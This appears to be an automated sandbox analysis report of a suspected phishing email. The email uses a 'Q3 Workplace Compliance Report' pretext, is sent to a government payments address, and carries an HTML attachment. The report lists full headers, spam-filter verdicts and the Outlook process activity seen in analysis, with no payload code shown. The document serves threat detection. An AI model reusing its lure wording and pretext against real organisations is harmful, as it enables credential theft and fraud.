    File Content Preview:Received: from SY5PR01CA0051.ausprd01.prod.outlook.com (2603:10c6:10:1fc::11).. by SYBPR01MB6126.ausprd01.prod.outlook.com (2603:10c6:10:9d::13) with.. Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.8048.18

    Static Mail

    General

    Subject:Complete and Submit Q3 Workplace Compliance Report by 10/9/2024 | ID-4546.NLKBZ:8c3f5541a91374b5bf18ac88017a597742a1891a
    From:WorkplaceHQ <angelika.klingler@kabelrinn.at>
    To:paymentservices@icare.nsw.gov.au
    Cc:
    BCC:
    Date:Wed, 09 Oct 2024 14:10:30 +0000
    Communications:
      Attachments:

        Headers

        Key Value
        Receivedfrom [127.0.0.1] (unknown [192.71.166.200]) by mail.kabelrinn.at (Postfix) with ESMTPSA id 52C363B6F9D for <paymentservices@icare.nsw.gov.au>; Wed, 9 Oct 2024 16:10:31 +0200 (CEST)
        Authentication-Resultsspf=pass (sender IP is 185.98.68.35) smtp.mailfrom=kabelrinn.at; dkim=pass (signature was verified) header.d=kabelrinn.at;dmarc=pass action=none header.from=kabelrinn.at;compauth=pass reason=100
        Received-SPFPass (protection.outlook.com: domain of kabelrinn.at designates 185.98.68.35 as permitted sender) receiver=protection.outlook.com; client-ip=185.98.68.35; helo=as1.kabelrinn.at; pr=C
        DKIM-FilterOpenDKIM Filter v2.10.3 mail.kabelrinn.at 84AEF3B6D33
        DKIM-Signaturev=1; a=rsa-sha256; c=relaxed/relaxed; d=kabelrinn.at; s=A696B41A-4E3C-11EF-99D0-B28A843D9D7D; t=1728484423; bh=fLr0Z0p4EBZ6yJmWyr5nnZiwg7hZWF1ywZa/7SooN1U=; h=From:To:Message-ID:Date:MIME-Version; b=ZvYafZU3ZIsdR93jLVDezaLzkaJkCQNRvGCMp+RCvuDmArlWdO3cJ20hNTegCijuw ILvf6CK9D4B7ixTAHksga1SZ5ypJkIHDdPeomB/KzkCpElYhnoI3Nds2qkbGsem5xt PoDJd/W7jexNcE5QIt2VV+7IUCSRbDrwUu3ge5NQLjwrNZdqNhluvgulc7cTof3r4V toGWD8NKsw7fWQAUT4YKsqGsKegthpmKG0Rro3RvWBz6fkV0gsGaX3u4WVcHzt7ZAe begdktk9Lj/LcBLy5TQFT9ktif9BBMU1Jd3gi9/Vt2WN9a8OidF710u9m9ey2n7v9A 94JWjY4rXK7gQ==
        X-Virus-Scannedamavis at mail.kabelrinn.at
        Content-Typetext; name="Compliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.html"
        Content-Transfer-Encodingbase64
        Content-Dispositionattachment; filename="Compliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.html"
        FromWorkplaceHQ <angelika.klingler@kabelrinn.at>
        Topaymentservices@icare.nsw.gov.au
        SubjectComplete and Submit Q3 Workplace Compliance Report by 10/9/2024 | ID-4546.NLKBZ:8c3f5541a91374b5bf18ac88017a597742a1891a
        Message-ID<7baad9be-6976-db43-6272-98725490a5c2@kabelrinn.at>
        DateWed, 09 Oct 2024 14:10:30 +0000
        MIME-Version1.0
        Return-Pathangelika.klingler@kabelrinn.at
        X-EOPAttributedMessage0
        X-EOPTenantAttributedMessage34ae0514-4eb5-4608-8b64-b002d2054238:0
        X-MS-PublicTrafficTypeEmail
        X-MS-TrafficTypeDiagnosticSY1PEPF00005A3C:EE_|SYBPR01MB6126:EE_
        X-MS-Office365-Filtering-Correlation-Id4beb35c9-4d84-488f-80ff-08dcea6609a6
        X-MS-Exchange-AtpMessagePropertiesSA|SL
        X-Forefront-Antispam-Report CIP:185.98.68.35;CTRY:AT;LANG:en;SCL:9;SRV:;IPV:NLI;SFV:SPM;H:as1.kabelrinn.at;PTR:as.kabelrinn.at;CAT:AMP;SFS:(13230040)(12012899012)(2613699012)(43540500003);DIR:INB;
        X-Microsoft-AntispamBCL:0;ARA:13230040|12012899012|2613699012|43540500003;
        X-Microsoft-Antispam-Message-Info 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

        File Icon

        Icon Hash:46070c0a8e0c67d6

        Network Behavior

        No network behavior found

        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        Behavior

        Click to jump to process

        System Behavior

        General

        Target ID:0
        Start time:22:35:55
        Start date:13/10/2024
        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\9ba54f65-7bc2-d549-b688-53131649ef52.eml"
        Imagebase:0x7c0000
        File size:34'446'744 bytes
        MD5 hash:91A5292942864110ED734005B7E005C0
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        General

        Target ID:4
        Start time:22:36:03
        Start date:13/10/2024
        Path:C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D675929E-58F5-446D-A282-324992C7C8DE" "6968D5F9-FDC3-4959-BF37-5B5D02ACDBD9" "7832" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
        Imagebase:0x7ff768880000
        File size:710'048 bytes
        MD5 hash:EC652BEDD90E089D9406AFED89A8A8BD
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Disassembly

        No disassembly